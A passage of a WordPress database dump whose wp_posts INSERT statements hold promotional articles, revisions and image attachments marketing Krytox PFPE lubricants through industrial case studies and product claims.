material they may contact.', 'The Power of PFPE Lubricant Selection', '', 'publish', 'closed', 'closed', '', 'power-pfpe-lubricant-selection', '', '', '2017-03-01 13:44:09', '2017-03-01 13:44:09', '', 0, 'https://www.miller-stephenson.com/?p=3760', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (3761, 2, '2017-02-28 16:56:30', '2017-02-28 16:56:30', '', 'krytox-plant-savings', '', 'inherit', 'closed', 'closed', '', 'krytox-plant-savings', '', '', '2017-02-28 16:56:30', '2017-02-28 16:56:30', '', 3760, 'https://www.miller-stephenson.com/wp-content/uploads/2017/02/krytox-plant-savings.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3762, 2, '2017-02-28 19:15:05', '2017-02-28 19:15:05', '', 'krytox pfpe lubricant', '', 'inherit', 'closed', 'closed', '', 'krytox-pfpe-lubricant', '', '', '2017-02-28 19:15:27', '2017-02-28 19:15:27', '', 3760, 'https://www.miller-stephenson.com/wp-content/uploads/2017/02/Krytox-PFPE-Lubricant.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3763, 2, '2017-02-28 19:16:31', '2017-02-28 19:16:31', '<h2><strong>How Manufacturers Have Reduced Downtime and Costs | PFPE Lubricant | Krytox</strong></h2>\r\nFrom equipment selection to maintenance cycles and troubleshooting, we know you work tirelessly to achieve peak plant performance every day. With the average plant using more than 2,000 bearings – in addition to the valves, seals and other PFPE lubricant reliant components – lubrication plays a critical role in plant performance.<img class="wp-image-3761 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/krytox-plant-savings.jpg" alt="krytox-plant-savings" width="273" height="303" />\r\n\r\nFinding a lubricant that can perform, even in the harshest of conditions, can help extend asset life, reduce downtime and control maintenance costs. Perfluoropolyether (PFPE) lubricants are proven to outperform traditional lubricants in four key areas: over time, under extreme pressures, in extreme heat and in extremely harsh conditions.\r\n\r\nLearn how four manufacturing plants were able to improve plant performance by switching to Krytox PFPE lubricants.\r\n<h4><strong>The Test of Time</strong></h4>\r\nPFPE lubricants have proven endurance over time at extreme temperatures. In fact, a British bottling plant was struggling to keep its labeling machine gearbox operating fulltime because shaft seals lasted only two weeks. This led to frequent unscheduled downtime and high maintenance costs. The company needed a lubricant that would withstand extremely high temperatures over time, minimize leakage from failing seals – which produced a food quality concern – and was safe for its employees.\r\n\r\nThe company selected a Krytox PFPE lubricant, which offers lasting performance at temperatures greater than 400 °C (752 °F). The solution worked so well that the gearbox is now changed every two years during routine plant maintenance.\r\n<h4><strong>The Test of Pressure</strong></h4>\r\nKrytox lubricants are also proven to outperform hydrocarbon lubricants under extreme pressure. A German manufacturer of exhaust gas recirculation (EGR) valves needed to improve product reliability. Operating under extreme pressure, in a broad temperature range (-40 °C to 200 °C [-40 °F to 392 °F]), with heavy vibrations, the valves regularly failed.\r\n\r\nA Krytox PFPE lubricant provided the answer the company needed – providing superior lubricity at the lowest temperatures, withstanding a rigorous vibration test and improving product reliability. The manufacturer estimates that the switch in lubricants saves nearly $90,000 annually.\r\n<h4><strong>The Test of Heat</strong></h4>\r\nNumerous tests have demonstrated PFPEs’ reliable performance under high heat, maintaining lubricity at temperatures greater than 400 °C (752 °F). A notable example comes from the ammonia industry. One company was plagued by frequent bearings failures in its reformer furnace blower due to the lithium grease decomposing at the high operating temperature (290 °C [554 °F]). The company sought out a chemically inert lubricant – capable of performing alongside ammonia – with a once-a-year re-lubrication cycle due to the maintenance safety risk, potential fire hazard involved with shutdown and production loss.\r\n\r\nA high-temperature PFPE lubricant, specially designed to provide optimal performance between 200 °C and 300 °C (392 °F and 572 °F), met the challenge. Because PFPEs are nonflammable and chemically inert, safety improved. As a result, the bearings in the reformer furnace blower do not lose lubricity and the maintenance schedule can remain confidently at 12 month intervals, reducing the company’s operating costs\r\nand safety risk.\r\n<h4><strong>The Test of Harshness</strong></h4>\r\nLastly, PFPE lubricants provide optimal performance in extreme conditions. A Taiwanese manufacturer struggled to adequately lubricate the pressure gauge within its chlorine piping system, part of a titanium dioxide manufacturing operation. Gauge failures threatened worker safety, resulted in downtime and increased maintenance expense.\r\n\r\nThe company searched for a replacement lube that was stable at high temperatures, resistant to chlorine gas and could handle the harsh operating environment. The company met the challenge by using a nonflammable PFPE lubricant with good high-temperature stability, providing long-term stability at operating temperatures up to 150 °C (302 °F).\r\n<h4><strong>About Krytox™ PFPE Lubricants</strong></h4>\r\nKrytox™ lubricants are Chemours’ line of high quality PFPE oils and greases, which have been proven to offer longterm performance and superior value. These lubricants are PFPEs, resulting in exceptional chemical stability. Therefore, they are thermally stable, nonflammable and insoluble in water, acids, bases, and most organic and all non-fluorinated solvents.\r\n\r\nAdditionally, Krytox™ lubricants are <a href="https://www.iso.org/iso-9001-quality-management.html">ISO 9001</a> and <a href="https://www.iso.org/iso-14001-environmental-management.html">ISO 14001</a> certified, and several grades are NSF H-1.\r\n<h4><strong>The attributes of Krytox™ lubricants include:</strong></h4>\r\n<strong>Performance over a wide temperature range</strong>\r\nExtreme heat or cold have no effect on the lubricity of these lubricants, effective from -75 °C to greater than 400 °C (-103 °F to 752 °F), depending upon operating conditions and product grade.\r\n\r\n<strong>Resistant to chemical attack</strong>\r\nKrytox™ lubricants withstand oxygen, acids and other aggressive substances.\r\n\r\n<strong>Low evaporation</strong>\r\nKrytox™ lubricants – within the recommended temperature ranges – experience almost zero evaporation or chemical changes over the many years of a machine’s service life.\r\n\r\n<strong>Compatibility</strong>\r\nKrytox™ lubricants won’t harm painted surfaces or most elastomeric materials. They are compatible with almost every material they may contact.', 'The Power of PFPE Lubricant Selection', '', 'inherit', 'closed', 'closed', '', '3760-revision-v1', '', '', '2017-02-28 19:16:31', '2017-02-28 19:16:31', '', 3760, 'https://www.miller-stephenson.com/3760-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3764, 0, '2017-02-28 20:04:17', '2017-02-28 20:04:17', '', '', '', 'publish', 'closed', 'closed', '', '3764', '', '', '2017-02-28 20:04:18', '2017-02-28 20:04:18', '', 0, 'https://www.miller-stephenson.com/nf_sub/3764/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3765, 0, '2017-02-28 20:15:18', '2017-02-28 20:15:18', '', '', '', 'publish', 'closed', 'closed', '', '3765', '', '', '2017-02-28 20:15:19', '2017-02-28 20:15:19', '', 0, 'https://www.miller-stephenson.com/nf_sub/3765/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3766, 0, '2017-02-28 21:36:38', '2017-02-28 21:36:38', '', '', '', 'publish', 'closed', 'closed', '', '3766', '', '', '2017-02-28 21:36:39', '2017-02-28 21:36:39', '', 0, 'https://www.miller-stephenson.com/nf_sub/3766/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3767, 2, '2017-03-01 15:01:23', '2017-03-01 15:01:23', '<h2><strong>How To Work With Your OEM To Find The Best Lubricant</strong></h2>\r\n<h3><strong>Nothing is as Expensive as Cheap Lubricant</strong></h3>\r\nAs a plant operator, there’s a lot to manage. Ensuring that the plant is functioning at optimum levels requires management prowess, people skills and broad-based technical knowledge. Increasingly, as machines run hotter and environments get more extreme, it also requires a deeper understanding of lubricants and the best lubricant.\r\n\r\nMost maintenance-repair-operations (MROs) have witnessed this first hand. It’s not uncommon for seals to fail or leak, for valves to fail fugitive emissions tests or electric motor lubricants to come up short of expectations.\r\n\r\n“It is generally accepted that over 60 percent of all mechanical failures relate directly to poor or improper lubrication practices,” according to Kenneth Bannister in his book, Lubrication for Industry. According to Power Magazine, lubricants typically make up less than 1 percent of a plant’s operating cost, but can directly influence more than half of the total maintenance cost. A good lubrication program can reduce downtime and keep maintenance costs under control, in order to drive performance and increase profitability.\r\n\r\nDespite this, many plants have come to accept less-than-optimum performance. For instance, it’s become standard operating procedure in many plants to re-lubricate components every couple of hours, days or weeks.. However, that can be costly and time-consuming, creating an overall drag on efficiency and productivity.\r\n\r\nConsequently, design engineers, MRO staff, maintenance personnel, lubricant specialists and plant operators have a vested interest in identifying the best lubricant based on original equipment manufacturer (OEM) specifications and the product-to-cost ratio. If your equipment is still under warranty, it’s important to have approval from the OEM to prevent voiding the warranties.\r\n<h4><strong>According to Power Magazine, lubricants typically make up less than 1 percent of a plant’s operating cost, but can directly influence more than half of the total maintenance cost.</strong></h4>\r\nIn situations where machine failures recur, plant operators can and should seek better lubricant alternatives. It begins by having a discussion with the OEM about recommendations and what non-objection solutions are available.\r\n\r\nOEMs make recommendations based upon a variety of factors, including the particular component, the operating environment and price-to-cost ratios. Having input from plant operators regarding demands and specifications can help to find the best solution. In many instances, the OEM has made its decision for a specific reason. However, as pointed out at the opening of this whitepaper, lubricants can directly impact more than 50 percent of maintenance costs; for this reason, plant operators should not be shy about seeking the best possible solution for their situation. The key is to be armed with good data and utilize all available resources.\r\n<h4><strong><img class="wp-image-3769 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/03/krytox-considerations.jpg" alt="krytox considerations" width="236" height="389" />Alternative and Non-Objection Lubricants</strong></h4>\r\nFor starters, MROs should ask about alternative lubricants and what non-objection solutions are available. In addition to specified lubricants, OEMs often have a list of approved alternatives MROs can use without fear of voided warranties – known as non-objection lubricants. There are hundreds of specialty lubricants formulated to meet specific design demands and OEM specifications. The major lubricant types are shown in the table below. PFPE\'s are the best lubricant available.\r\n<h4><strong>The Difference PFPEs Can Make</strong></h4>\r\nFor ambient temperatures, the less expensive lubricant options work fine. Traditionally, PFPEs are not the first OEM choice due to price considerations. However, in extreme environments, cost benefit analyses are leading more OEMs to embrace PFPEs; they’re realizing that PFPEs provide a greater value for an increasing number of components, because they provide stable, lasting performance under harsh conditions. The initial price per unit is higher than common petroleum-based lubricants, but the PFPE benefits quickly outweigh the costs.\r\n\r\nThere are several common points of vulnerability in most plants — beginning with the multitude of valves and seals that are under extreme conditions. The high heat, exposure to chemicals and other operational conditions can have a detrimental effect on lubricant performance. It’s common for MROs using lower classifications of lubricant to re-lube these components on a frequent basis or accept failures; with PFPEs, that need is greatly reduced, freeing personnel for other tasks and minimizing downtime caused by the need to replace worn out components.\r\n\r\nPFPEs can also extend the life of electric motors – specifically, the bearings that so often are the cause of motor failures in plants. It’s typical for a motor that has failed because of oxidized bearings to be replaced, leading to an increased expense and, perhaps more importantly, lost productivity while the motor is being replaced. PFPEs will decrease wear on the bearings and can greatly increase the motor’s life and reliability.\r\n\r\n<img class="wp-image-3770 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2017/03/krytox-vs-competitors.jpg" alt="krytox vs competitors" width="539" height="302" />\r\n\r\nPFPEs are inert, insoluble, non-toxic, nonflammable, odorless and colorless. This means that they can withstand fuels, coolants, hydraulic fluids, engine oil, solvents and battery acids, delivering almost zero evaporation and no chemical changes over many years.\r\n\r\nBecause PFPEs provide longer lasting lubrication, this lowers the frequency of re-lubrication and reduces the amount of lubricant needed and reducing operating cost. Additionally, PFPEs are not petroleum-based, don’t have any volatile organic compounds (VOCs) and the oils are recyclable. All in all, it adds up to PFPEs having a reduced negative environmental impact.\r\n<h4><strong>About Krytox™ PFPE Lubricants</strong></h4>\r\n<a href="https://www.miller-stephenson.com/krytox/">Krytox™ lubricants</a> are Chemours’ line of high quality PFPE oils and greases, which have been proven to offer long term performance and superior value. These lubricants are PFPEs, resulting in exceptional chemical stability. Therefore, they are thermally stable, nonflammable and insoluble in water, acids, bases, and most organic and all non-fluorinated solvents.\r\n\r\nAdditionally, Krytox™ lubricants are <a href="https://www.iso.org/iso-9001-quality-management.html">ISO 9001</a> and <a href="https://www.iso.org/iso-14001-environmental-management.html">ISO 14001</a> certified, and several grades are <a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">NSF H-1</a>.\r\n\r\n<img class="wp-image-3771 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/03/krytox-pfpe-performance.jpg" alt="krytox-pfpe-performance" width="187" height="100" />\r\n<h4><strong>The attributes of Krytox™ lubricants include:</strong></h4>\r\n<strong>Performance over a wide temperature range</strong>\r\nExtreme heat or cold have no effect on the lubricity of these lubricants, effective from -75 °C to greater than 400 °C (-103 °F to 752 °F), depending upon operating conditions and product grade.\r\n\r\n<strong>Resistant to chemical attack</strong>\r\nKrytox™ lubricants withstand oxygen, acids and other aggressive substances.\r\n\r\n<strong>Low evaporation</strong>\r\nKrytox™ lubricants – within the recommended temperature ranges – experience almost zero evaporation or chemical changes over the many years of a machine’s service life.\r\n\r\n<strong>Compatibility</strong>\r\nKrytox™ lubricants won’t harm painted surfaces or most elastomeric materials. They are compatible with almost every material they may contact.\r\n\r\n<a href="https://www.miller-stephenson.com/contact/">Contact us</a> to find out why Krytox is the best lubricant available.', 'Do OEM Lubricant Recommendations Meet Your Current Needs?', '', 'publish', 'closed', 'closed', '', 'best-lubricant-vs-cheap-lubricant', '', '', '2017-03-01 17:19:37', '2017-03-01 17:19:37', '', 0, 'https://www.miller-stephenson.com/?p=3767', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (3768, 2, '2017-03-01 14:26:50', '2017-03-01 14:26:50', '', 'Do OEM Lubricant Recommendations Meet Your Current', '', 'inherit', 'closed', 'closed', '', '3767-revision-v1', '', '', '2017-03-01 14:26:50', '2017-03-01 14:26:50', '', 3767, 'https://www.miller-stephenson.com/3767-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3769, 2, '2017-03-01 14:36:39', '2017-03-01 14:36:39', '', 'krytox considerations', '', 'inherit', 'closed', 'closed', '', 'krytox-considerations', '', '', '2017-03-01 14:36:53', '2017-03-01 14:36:53', '', 3767, 'https://www.miller-stephenson.com/wp-content/uploads/2017/03/krytox-considerations.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3770, 2, '2017-03-01 14:40:44', '2017-03-01 14:40:44', '', 'krytox vs competitors', '', 'inherit', 'closed', 'closed', '', 'krytox-vs-competitors', '', '', '2017-03-01 14:41:04', '2017-03-01 14:41:04', '', 3767, 'https://www.miller-stephenson.com/wp-content/uploads/2017/03/krytox-vs-competitors.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3771, 2, '2017-03-01 14:43:15', '2017-03-01 14:43:15', '', 'krytox-pfpe-performance', '', 'inherit', 'closed', 'closed', '', 'krytox-pfpe-performance', '', '', '2017-03-01 14:43:15', '2017-03-01 14:43:15', '', 3767, 'https://www.miller-stephenson.com/wp-content/uploads/2017/03/krytox-pfpe-performance.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3772, 2, '2017-03-01 14:58:27', '2017-03-01 14:58:27', '', 'Krytox Best Lubricant', '', 'inherit', 'closed', 'closed', '', 'krytox-best-lubricant', '', '', '2017-03-01 14:58:43', '2017-03-01 14:58:43', '', 3767, 'https://www.miller-stephenson.com/wp-content/uploads/2017/03/krytox-best-lubricant.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3773, 2, '2017-03-01 15:01:23', '2017-03-01 15:01:23', '<h2><strong>How To Work With Your OEM To Find The Best Lubricant</strong></h2>\r\n<h3><strong>Nothing is as Expensive as Cheap Lubricant</strong></h3>\r\nAs a plant operator, there’s a lot to manage. Ensuring that the plant is functioning at optimum levels requires management prowess, people skills and broad-based technical knowledge. Increasingly, as machines run hotter and environments get more extreme, it also requires a deeper understanding of lubricants and the best lubricant.\r\n\r\nMost maintenance-repair-operations (MROs) have witnessed this first hand. It’s not uncommon for seals to fail or leak, for valves to fail fugitive emissions tests or electric motor lubricants to come up short of expectations.\r\n\r\n“It is generally accepted that over 60 percent of all mechanical failures relate directly to poor or improper lubrication practices,” according to Kenneth Bannister in his book, Lubrication for Industry. According to Power\r\nMagazine, lubricants typically make up less than 1 percent of a plant’s operating cost, but can directly influence more than half of the total maintenance cost. A good lubrication program can reduce downtime and keep maintenance costs under control, in order to drive performance and increase profitability.\r\n\r\nDespite this, many plants have come to accept less-than-optimum performance. For instance, it’s become standard operating procedure in many plants to re-lubricate components every couple of hours, days or weeks.. However, that can be costly and time-consuming, creating an overall drag on efficiency and productivity.\r\n\r\nConsequently, design engineers, MRO staff, maintenance personnel, lubricant specialists and plant operators have a vested interest in identifying the best lubricant based on original equipment manufacturer (OEM) specifications and the product-to-cost ratio. If your equipment is still under warranty, it’s important to have approval from the OEM to prevent voiding the warranties.\r\n<h4><strong>According to Power Magazine, lubricants typically make up less than 1 percent of a plant’s operating cost, but can directly influence more than half of the total maintenance cost.</strong></h4>\r\nIn situations where machine failures recur, plant operators can and should seek better lubricant alternatives. It begins by having a discussion with the OEM about recommendations and what non-objection solutions are available.\r\n\r\nOEMs make recommendations based upon a variety of factors, including the particular component, the operating environment and price-to-cost ratios. Having input from plant operators regarding demands and specifications can help to find the best solution. In many instances, the OEM has made its decision for a specific reason. However, as pointed out at the opening of this whitepaper, lubricants can directly impact more than 50 percent of maintenance costs; for this reason, plant operators should not be shy about seeking the best possible solution for their situation. The key is to be armed with good data and utilize all available resources.\r\n<h4><strong><img class="wp-image-3769 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/03/krytox-considerations.jpg" alt="krytox considerations" width="236" height="389" />Alternative and Non-Objection Lubricants</strong></h4>\r\nFor starters, MROs should ask about alternative lubricants and what non-objection solutions are available. In addition to specified lubricants, OEMs often have a list of approved alternatives MROs can use without fear of voided warranties – known as non-objection lubricants. There are hundreds of specialty lubricants formulated to meet specific design demands and OEM specifications. The major lubricant types are shown in the table below. PFPE\'s are the best lubricant available.\r\n<h4><strong>The Difference PFPEs Can Make</strong></h4>\r\nFor ambient temperatures, the less expensive lubricant options work fine. Traditionally, PFPEs are not the first OEM choice due to price considerations. However, in extreme environments, cost benefit analyses are leading more OEMs to embrace PFPEs; they’re realizing that PFPEs provide a greater value for an increasing number of components, because they provide stable, lasting performance under harsh conditions. The initial price per unit is higher than common petroleum-based lubricants, but the PFPE benefits quickly outweigh the costs.\r\n\r\nThere are several common points of vulnerability in most plants — beginning with the multitude of valves and seals that are under extreme conditions. The high heat, exposure to chemicals and other operational conditions can have a detrimental effect on lubricant performance. It’s common for MROs using lower classifications of lubricant to re-lube these components on a frequent basis or accept failures; with PFPEs, that need is greatly reduced, freeing personnel for other tasks and minimizing downtime caused by the need to replace worn out components.\r\n\r\nPFPEs can also extend the life of electric motors – specifically, the bearings that so often are the cause of motor failures in plants. It’s typical for a motor that has failed because of oxidized bearings to be replaced, leading to an increased expense and, perhaps more importantly, lost productivity while the motor is being replaced. PFPEs will decrease wear on the bearings and can greatly increase the motor’s life and reliability.\r\n\r\n<img class="wp-image-3770 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2017/03/krytox-vs-competitors.jpg" alt="krytox vs competitors" width="539" height="302" />\r\n\r\nPFPEs are inert, insoluble, non-toxic, nonflammable, odorless and colorless. This means that they can withstand fuels, coolants, hydraulic fluids, engine oil, solvents and battery acids, delivering almost zero evaporation and no chemical changes over many years.\r\n\r\nBecause PFPEs provide longer lasting lubrication, this lowers the frequency of re-lubrication and reduces the amount of lubricant needed and reducing operating cost. Additionally, PFPEs are not petroleum-based, don’t have any volatile organic compounds (VOCs) and the oils are recyclable. All in all, it adds up to PFPEs having a reduced negative environmental impact.\r\n<h4><strong>About Krytox™ PFPE Lubricants</strong></h4>\r\n<a href="https://www.miller-stephenson.com/krytox/">Krytox™ lubricants</a> are Chemours’ line of high quality PFPE oils and greases, which have been proven to offer long term performance and superior value. These lubricants are PFPEs, resulting in exceptional chemical stability. Therefore, they are thermally stable, nonflammable and insoluble in water, acids, bases, and most organic and all non-fluorinated solvents.\r\n\r\nAdditionally, Krytox™ lubricants are <a href="https://www.iso.org/iso-9001-quality-management.html">ISO 9001</a> and <a href="https://www.iso.org/iso-14001-environmental-management.html">ISO 14001</a> certified, and several grades are <a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">NSF H-1</a>.\r\n\r\n<img class="wp-image-3771 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/03/krytox-pfpe-performance.jpg" alt="krytox-pfpe-performance" width="187" height="100" />\r\n<h4><strong>The attributes of Krytox™ lubricants include:</strong></h4>\r\n<strong>Performance over a wide temperature range</strong>\r\nExtreme heat or cold have no effect on the lubricity of these lubricants, effective from -75 °C to greater than 400 °C (-103 °F to 752 °F), depending upon operating conditions and product grade.\r\n\r\n<strong>Resistant to chemical attack</strong>\r\nKrytox™ lubricants withstand oxygen, acids and other aggressive substances.\r\n\r\n<strong>Low evaporation</strong>\r\nKrytox™ lubricants – within the recommended temperature ranges – experience almost zero evaporation or chemical changes over the many years of a machine’s service life.\r\n\r\n<strong>Compatibility</strong>\r\nKrytox™ lubricants won’t harm painted surfaces or most elastomeric materials. They are compatible with almost every material they may contact.\r\n\r\n<a href="https://www.miller-stephenson.com/contact/">Contact us</a> to find out why Krytox is the best lubricant available.', 'Do OEM Lubricant Recommendations Meet Your Current Needs?', '', 'inherit', 'closed', 'closed', '', '3767-revision-v1', '', '', '2017-03-01 15:01:23', '2017-03-01 15:01:23', '', 3767, 'https://www.miller-stephenson.com/3767-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3774, 0, '2017-03-01 15:22:19', '2017-03-01 15:22:19', '', '', '', 'publish', 'closed', 'closed', '', '3774', '', '', '2017-03-01 15:22:20', '2017-03-01 15:22:20', '', 0, 'https://www.miller-stephenson.com/nf_sub/3774/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3775, 0, '2017-03-01 15:23:20', '2017-03-01 15:23:20', '', '', '', 'publish', 'closed', 'closed', '', '3775', '', '', '2017-03-01 15:23:20', '2017-03-01 15:23:20', '', 0, 'https://www.miller-stephenson.com/nf_sub/3775/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3776, 0, '2017-03-01 15:28:38', '2017-03-01 15:28:38', '', '', '', 'publish', 'closed', 'closed', '', '3776', '', '', '2017-03-01 15:28:38', '2017-03-01 15:28:38', '', 0, 'https://www.miller-stephenson.com/nf_sub/3776/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3777, 2, '2017-03-01 15:48:24', '2017-03-01 15:48:24', '<h3>When it Comes to Lubricants, the Lowest Price isn’t Always the Best Value</h3>\r\nMachine failures occur for a variety of reasons. Each one of these failures creates a ripple effect of costs and productivity loss. Some of these issues can be mitigated by choosing a high-performance lubricant – one that can withstand time and harsh environments. While high-performance lubricants are more expensive initially, the added expenditure is recovered through reduced breakdowns, downtime and maintenance costs, which results in long-term overall savings.\r\n<h4><strong>Find Compatibility and Productivity with High-Performing Krytox (PFPEs)</strong></h4>\r\n<img class="wp-image-3728 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/Lubrication-Cost-Savings.jpg" alt="lubrication-cost-savings" width="215" height="255" />High-performance perfluoropolyether (PFPE) lubricants are inert, water and oil repellant, solvent resistant, nonflammable, non-toxic, and compatible with most common elastomers, plastics and metals. This unique chemistry enables them to outlast and outperform conventional hydrocarbon. Krytox lubricants perform under extreme temperatures, extreme pressure and exposure to harsh chemicals.\r\n\r\n<strong>Significantly Reduce Re-lubrication Intervals</strong>\r\n\r\nIt’s common practice to use hydrocarbon or silicone-based lubricants to re-lube components on a daily, weekly or monthly basis. With Krytox, that need is greatly reduced, freeing personnel for other tasks and minimizing downtime caused by the need to replace worn out components. Following are a few examples of Krytox driving performance, value and reducing downtime.\r\n<h4><strong>Krytox can Generate Savings</strong></h4>\r\nOne copper rod manufacturer believed lubricating its rollers’ bearings (operating temperatures over 200 °C [400 °F]) every four hours with a synthetic hydrocarbon grease was the longest lasting solution available. However, by switching to a PFPE lubricant, they lowered re-lubrication to a monthly interval and cut annual bearing failures by nearly 98% (reducing replacements from 186 bearings each year to four). By switching to Krytox, this manufacturer reduced maintenance costs, parts costs and production downtime. A cost analysis showed a total annual savings of $66,920.<img class="wp-image-3727 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/Krytox-Cost-Saving.jpg" alt="krytox-cost-saving" width="347" height="252" />\r\n<h4><strong>Krytox Can Extend Service Life</strong></h4>\r\nA U.S. textile manufacturer utilizes a hot flue drying oven as part of its process. In the drying oven, wet fabric passes along many bearing rolls inside a large metallic box, moving through nine heated zones with temperatures reaching 218 °C [425°F]. The company was replacing at least six bearings per month due to premature bearing failures. Frequent downtime was adversely affecting productivity. Worse, fabric quality was compromised. The manufacturer needed a lubricant that would retain its integrity at high temperatures in high humidity environments. After using a high-temperature Krytox grease, the manufacturer experienced a significant extension of bearing service life, minimizing costly downtime.\r\n<h4><strong>Krytox Can Limit Hazards</strong></h4>\r\nA polyethylene manufacturer was struggling with maintenance costs and frequent shutdowns of its high-capacity, sealed centrifuge because of hazardous material exposure. Specifically, a mineral oil lithium thickened grease, used in the centrifuge bearings, leaked and led to premature bearing failures. The leaking hazardous solvent created an additional exposure threat to workers. The new lubricant needed to be non-reactive and insoluble to hexane, provide enough adhesion to avoid leaks, and remain fluid enough to deliver the required lubrication. The manufacturer turned to Krytox. Since doing so, unplanned shutdowns and re-lubrication have both been reduced – with re-lubrication down to twice a year. These dramatic results decreased maintenance costs and increased worker safety.\r\n<h4><strong>About Krytox™ PFPE Lubricants</strong></h4>\r\nKrytox™ lubricants are Chemours’ line of high quality PFPE oils and greases, which have been proven to offer long term performance and superior value. These lubricants are PFPEs, resulting in exceptional chemical stability. Therefore, they are thermally stable, nonflammable and insoluble in water, acids, bases, and most organic and all non-fluorinated solvents. Additionally, Krytox™ lubricants are ISO 9001 and ISO 14001 certified, and several grades are NSF H-1.\r\n<h4><strong>The attributes of Krytox™ lubricants include:</strong></h4>\r\n<strong>Performance over a wide temperature range</strong>\r\nExtreme heat or cold have no effect on the lubricity of these lubricants, effective from -75 °C to greater than 400 °C (-103 °F to 752 °F), depending upon operating conditions and product grade. Resistant to chemical attack Krytox™ lubricants withstand oxygen, acids and other aggressive substances.\r\n\r\n<strong>Low evaporation</strong>\r\nKrytox™ lubricants – within the recommended temperature ranges – experience almost zero evaporation or chemical changes over the many years of a machine’s service life.\r\n\r\n<strong>Compatibility</strong>\r\nKrytox™ lubricants won’t harm painted surfaces or most elastomeric materials. They are compatible with almost every material they may contact.\r\n\r\n<span style="font-size: 75%;">The information set forth herein is furnished free of charge and based on technical data that Chemours believes to be reliable. Chemours makes no warranties, express or implied, and assumes no liability in connection with any use of this information. Nothing herein is to be taken as a license to operate under or a recommendation to infringe any patents or trademarks.</span>', 'How Krytox Drive Savings & Productivity', '', 'inherit', 'closed', 'closed', '', '3726-revision-v1', '', '', '2017-03-01 15:48:24', '2017-03-01 15:48:24', '', 3726, 'https://www.miller-stephenson.com/3726-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3778, 0, '2017-03-01 15:58:43', '2017-03-01 15:58:43', '', '', '', 'publish', 'closed', 'closed', '', '3778', '', '', '2017-03-01 15:58:43', '2017-03-01 15:58:43', '', 0, 'https://www.miller-stephenson.com/nf_sub/3778/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3779, 2, '2017-03-01 17:19:37', '2017-03-01 17:19:37', '<h2><strong>How To Work With Your OEM To Find The Best Lubricant</strong></h2>\r\n<h3><strong>Nothing is as Expensive as Cheap Lubricant</strong></h3>\r\nAs a plant operator, there’s a lot to manage. Ensuring that the plant is functioning at optimum levels requires management prowess, people skills and broad-based technical knowledge. Increasingly, as machines run hotter and environments get more extreme, it also requires a deeper understanding of lubricants and the best lubricant.\r\n\r\nMost maintenance-repair-operations (MROs) have witnessed this first hand. It’s not uncommon for seals to fail or leak, for valves to fail fugitive emissions tests or electric motor lubricants to come up short of expectations.\r\n\r\n“It is generally accepted that over 60 percent of all mechanical failures relate directly to poor or improper lubrication practices,” according to Kenneth Bannister in his book, Lubrication for Industry. According to Power Magazine, lubricants typically make up less than 1 percent of a plant’s operating cost, but can directly influence more than half of the total maintenance cost. A good lubrication program can reduce downtime and keep maintenance costs under control, in order to drive performance and increase profitability.\r\n\r\nDespite this, many plants have come to accept less-than-optimum performance. For instance, it’s become standard operating procedure in many plants to re-lubricate components every couple of hours, days or weeks.. However, that can be costly and time-consuming, creating an overall drag on efficiency and productivity.\r\n\r\nConsequently, design engineers, MRO staff, maintenance personnel, lubricant specialists and plant operators have a vested interest in identifying the best lubricant based on original equipment manufacturer (OEM) specifications and the product-to-cost ratio. If your equipment is still under warranty, it’s important to have approval from the OEM to prevent voiding the warranties.\r\n<h4><strong>According to Power Magazine, lubricants typically make up less than 1 percent of a plant’s operating cost, but can directly influence more than half of the total maintenance cost.</strong></h4>\r\nIn situations where machine failures recur, plant operators can and should seek better lubricant alternatives. It begins by having a discussion with the OEM about recommendations and what non-objection solutions are available.\r\n\r\nOEMs make recommendations based upon a variety of factors, including the particular component, the operating environment and price-to-cost ratios. Having input from plant operators regarding demands and specifications can help to find the best solution. In many instances, the OEM has made its decision for a specific reason. However, as pointed out at the opening of this whitepaper, lubricants can directly impact more than 50 percent of maintenance costs; for this reason, plant operators should not be shy about seeking the best possible solution for their situation. The key is to be armed with good data and utilize all available resources.\r\n<h4><strong><img class="wp-image-3769 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/03/krytox-considerations.jpg" alt="krytox considerations" width="236" height="389" />Alternative and Non-Objection Lubricants</strong></h4>\r\nFor starters, MROs should ask about alternative lubricants and what non-objection solutions are available. In addition to specified lubricants, OEMs often have a list of approved alternatives MROs can use without fear of voided warranties – known as non-objection lubricants. There are hundreds of specialty lubricants formulated to meet specific design demands and OEM specifications. The major lubricant 